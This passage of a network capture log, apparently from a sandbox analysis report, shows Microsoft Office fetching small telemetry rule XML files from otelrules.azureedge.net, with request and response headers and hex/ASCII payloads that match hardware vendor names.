                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        66192.168.2.54977513.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:32 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:32 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:32 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 416
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 6b1971c7-b01e-0053-1140-36cdf8000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142532Z-16547b76f7fm7xw6hC1DFW5px40000000kr0000000007zh4
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:32 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        67192.168.2.54977613.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:32 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:32 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 8514c3eb-001e-0082-0ba0-345880000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142532Z-1749fc9bdbdjznvchC1DFWx4dc00000002m000000000317h
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:32 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        68192.168.2.54977713.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:32 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:32 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 432
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 392771d5-701e-000d-1cd2-2c6de3000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142532Z-16547b76f7fj897nhC1DFWdwq40000000kqg000000001xus
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:32 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        69192.168.2.54977813.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:32 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:32 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:32 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 475
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BBA740822"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 1138df84-701e-0097-5940-36b8c1000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142532Z-1749fc9bdbdgs9sshC1DFWt6ws00000002vg00000000003q
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:32 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        70192.168.2.54977913.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:32 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:32 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB464F255"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 44d502e9-701e-000d-5c08-2c6de3000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142532Z-16547b76f7fr28cchC1DFWnuws0000000kz0000000000qb4
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:32 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        71192.168.2.54978013.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:32 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:33 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:33 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 474
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 03bc4034-001e-00a2-3978-36d4d5000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142533Z-r178fb8d765z9wvrhC1DFW1a0s00000000ug000000006p50
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:33 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        72192.168.2.54978113.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:33 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:33 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:33 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: fa98855d-501e-0064-4540-361f54000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142533Z-16547b76f7fj897nhC1DFWdwq40000000kh000000000h1hk
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:33 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        73192.168.2.54978213.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:33 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:33 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B984BF177"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: bf27f234-e01e-003c-2019-36c70b000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142533Z-r178fb8d765hbcjvhC1DFW50zc00000002q0000000009mxc
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:33 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        74192.168.2.54978313.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:33 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:33 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 405
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
